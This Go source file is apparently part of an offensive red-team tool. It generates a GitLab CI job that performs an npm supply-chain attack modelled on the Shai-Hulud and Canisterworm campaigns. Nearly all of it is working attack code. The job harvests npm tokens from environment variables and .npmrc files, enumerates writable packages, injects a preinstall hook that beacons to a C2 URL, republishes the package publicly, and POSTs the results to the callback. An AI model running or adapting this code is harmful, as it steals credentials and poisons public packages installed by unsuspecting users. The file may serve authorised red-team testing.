package payloads

import (
	"fmt"
	"strings"
)

// NpmTamperOptions configures a payload that tampers with npm packages by
// injecting a preinstall hook. This replicates techniques from the Shai-Hulud
// and Canisterworm campaigns where a compromised CI environment is used to
// modify and republish npm packages with malicious install hooks.
//
// Attack flow:
// 1. Harvest npm token from environment (NPM_TOKEN, NPM_CONFIG_TOKEN, NODE_AUTH_TOKEN)
// 2. Enumerate writable packages via npm access
// 3. Download the latest tarball from the registry
// 4. Inject preinstall hook into package.json
// 5. Repack and publish the tampered package
type NpmTamperOptions struct {
	Common         CommonOptions
	RegistryURL    string // npm registry URL (default: https://registry.npmjs.org)
	PackageName    string // specific package to tamper (auto-discover if empty)
	InjectedScript string // preinstall hook content (default: beacon to CallbackURL)
	CallbackURL    string // C2 callback for exfil results
}

// GenerateNpmTamperYAML returns a GitLab CI job that performs npm package tampering.
func GenerateNpmTamperYAML(o NpmTamperOptions) string {
	name, stage := o.Common.defaults("npm-tamper")
	img := o.Common.Image
	if strings.TrimSpace(img) == "" {
		img = "node:lts-alpine"
	}

	script := buildNpmTamperScript(o)
	indented := indentScript(script, "      ")

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (npm Token Tamper)
# Supply chain attack: inject preinstall hook into npm packages
stages: [%s]

%s:
  stage: %s
  image: %s%s
  script:
    - |
%s
  allow_failure: true%s
`, stage, name, stage, img, tagsLine(o.Common.Tags), indented, rulesManual(o.Common.Manual))
}

func buildNpmTamperScript(o NpmTamperOptions) string {
	var b strings.Builder

	registry := strings.TrimSpace(o.RegistryURL)
	if registry == "" {
		registry = "https://registry.npmjs.org"
	}
	callback := strings.TrimSpace(o.CallbackURL)
	injected := strings.TrimSpace(o.InjectedScript)
	if injected == "" && callback != "" {
		injected = fmt.Sprintf(`node -e "fetch('%s?pkg='+process.env.npm_package_name).catch(()=>{})"`, callback)
	}
	if injected == "" {
		injected = `echo "[*] npm tamper hook executed"`
	}

	b.WriteString("_NPM_TAMPER() {\n")
	b.WriteString("  _tdir=$(mktemp -d)\n")
	b.WriteString("  echo \"[*] npm package tamper attack starting...\"\n\n")

	// Step 1: Harvest npm token
	b.WriteString("  # Step 1: Harvest npm token from environment\n")
	b.WriteString("  _npm_token=\"\"\n")
	b.WriteString("  for _tvar in NPM_TOKEN NPM_CONFIG_TOKEN NODE_AUTH_TOKEN; do\n")
	b.WriteString("    _tval=$(eval echo '$'\"$_tvar\" 2>/dev/null)\n")
	b.WriteString("    if [ -n \"$_tval\" ]; then\n")
	b.WriteString("      _npm_token=\"$_tval\"\n")
	b.WriteString("      echo \"[+] Found npm token in $_tvar\"\n")
	b.WriteString("      break\n")
	b.WriteString("    fi\n")
	b.WriteString("  done\n\n")
	b.WriteString("  # Check .npmrc files\n")
	b.WriteString("  if [ -z \"$_npm_token\" ]; then\n")
	b.WriteString("    for _rc in \"$HOME/.npmrc\" \".npmrc\" \"/etc/npmrc\"; do\n")
	b.WriteString("      if [ -f \"$_rc\" ]; then\n")
	b.WriteString("        _npm_token=$(grep -E '//.*:_authToken=' \"$_rc\" 2>/dev/null | head -1 | sed 's/.*_authToken=//')\n")
	b.WriteString("        [ -n \"$_npm_token\" ] && echo \"[+] Found npm token in $_rc\" && break\n")
	b.WriteString("      fi\n")
	b.WriteString("    done\n")
	b.WriteString("  fi\n\n")
	b.WriteString("  if [ -z \"$_npm_token\" ]; then\n")
	b.WriteString("    echo \"[-] No npm token found, aborting\"\n")
	b.WriteString("    rm -rf \"$_tdir\"\n")
	b.WriteString("    return 1\n")
	b.WriteString("  fi\n\n")

	// Step 2: Configure npm
	b.WriteString("  # Step 2: Configure npm with harvested token\n")
	fmt.Fprintf(&b, "  npm config set registry \"%s\"\n", registry)
	fmt.Fprintf(&b, "  echo \"//%s/:_authToken=${_npm_token}\" >> \"$HOME/.npmrc\"\n",
		strings.TrimPrefix(strings.TrimPrefix(registry, "https://"), "http://"))
	b.WriteString("  echo \"[+] npm configured with token\"\n\n")

	// Step 3: Discover writable packages
	if strings.TrimSpace(o.PackageName) != "" {
		fmt.Fprintf(&b, "  # Step 3: Target specific package: %s\n", o.PackageName)
		fmt.Fprintf(&b, "  _target_pkg=\"%s\"\n\n", o.PackageName)
	} else {
		b.WriteString("  # Step 3: Discover writable packages\n")
		b.WriteString("  echo \"[*] Enumerating writable packages...\"\n")
		b.WriteString("  _target_pkg=$(npm access list packages --json 2>/dev/null | \\\n")
		b.WriteString("    python3 -c \"import sys,json; d=json.load(sys.stdin); print(next((k for k,v in d.items() if v=='read-write'),''))\" 2>/dev/null)\n")
		b.WriteString("  if [ -z \"$_target_pkg\" ]; then\n")
		b.WriteString("    echo \"[-] No writable packages found\"\n")
		b.WriteString("    rm -rf \"$_tdir\"\n")
		b.WriteString("    return 1\n")
		b.WriteString("  fi\n")
		b.WriteString("  echo \"[+] Target package: $_target_pkg\"\n\n")
	}

	// Step 4: Download and extract tarball
	b.WriteString("  # Step 4: Download package tarball\n")
	b.WriteString("  cd \"$_tdir\"\n")
	b.WriteString("  npm pack \"$_target_pkg\" 2>/dev/null\n")
	b.WriteString("  _tarball=$(ls *.tgz 2>/dev/null | head -1)\n")
	b.WriteString("  if [ -z \"$_tarball\" ]; then\n")
	b.WriteString("    echo \"[-] Failed to download package tarball\"\n")
	b.WriteString("    rm -rf \"$_tdir\"\n")
	b.WriteString("    return 1\n")
	b.WriteString("  fi\n")
	b.WriteString("  echo \"[+] Downloaded: $_tarball\"\n\n")

	// Step 5: Extract, inject, repack
	b.WriteString("  # Step 5: Extract and inject preinstall hook\n")
	b.WriteString("  mkdir -p \"$_tdir/extract\"\n")
	b.WriteString("  tar xzf \"$_tarball\" -C \"$_tdir/extract\" 2>/dev/null\n")
	b.WriteString("  _pkg_dir=$(find \"$_tdir/extract\" -name \"package.json\" -maxdepth 2 | head -1 | xargs dirname)\n")
	b.WriteString("  if [ -z \"$_pkg_dir\" ] || [ ! -f \"$_pkg_dir/package.json\" ]; then\n")
	b.WriteString("    echo \"[-] package.json not found in tarball\"\n")
	b.WriteString("    rm -rf \"$_tdir\"\n")
	b.WriteString("    return 1\n")
	b.WriteString("  fi\n\n")
	b.WriteString("  echo \"[*] Injecting preinstall hook...\"\n")
	fmt.Fprintf(&b, "  _inject_cmd='%s'\n", injected)
	b.WriteString("  if command -v python3 >/dev/null 2>&1; then\n")
	b.WriteString("    python3 -c \"\nimport json, sys\nwith open('$_pkg_dir/package.json') as f:\n    pkg = json.load(f)\npkg.setdefault('scripts', {})['preinstall'] = '$_inject_cmd'\nwith open('$_pkg_dir/package.json', 'w') as f:\n    json.dump(pkg, f, indent=2)\n\" 2>/dev/null\n")
	b.WriteString("  else\n")
	b.WriteString("    # Fallback: sed-based injection\n")
	b.WriteString("    sed -i 's/\"scripts\"\\s*:/\"scripts\": { \"preinstall\": \"'\"$_inject_cmd\"'\" },/' \"$_pkg_dir/package.json\" 2>/dev/null\n")
	b.WriteString("  fi\n")
	b.WriteString("  echo \"[+] Preinstall hook injected\"\n\n")

	// Step 6: Repack and publish
	b.WriteString("  # Step 6: Repack and publish\n")
	b.WriteString("  cd \"$_pkg_dir\"\n")
	b.WriteString("  npm publish --access public 2>/dev/null\n")
	b.WriteString("  _pub_rc=$?\n")
	b.WriteString("  if [ $_pub_rc -eq 0 ]; then\n")
	b.WriteString("    echo \"[+] Tampered package published successfully\"\n")
	b.WriteString("  else\n")
	b.WriteString("    echo \"[-] Publish failed (rc=$_pub_rc)\"\n")
	b.WriteString("  fi\n\n")

	// Step 7: Report
	if callback != "" {
		b.WriteString("  # Step 7: Report results\n")
		b.WriteString("  curl -sS -X POST -H \"Content-Type: application/json\" \\\n")
		b.WriteString("    -d '{\"action\":\"npm_tamper\",\"package\":\"'\"$_target_pkg\"'\",\"status\":\"'\"$_pub_rc\"'\"}' \\\n")
		fmt.Fprintf(&b, "    \"%s\" >/dev/null 2>&1 || true\n\n", callback)
	}

	b.WriteString("  # Cleanup\n")
	b.WriteString("  rm -rf \"$_tdir\"\n")
	b.WriteString("  echo \"[*] npm tamper attack complete\"\n")
	b.WriteString("}\n\n_NPM_TAMPER\n")

	return b.String()
}
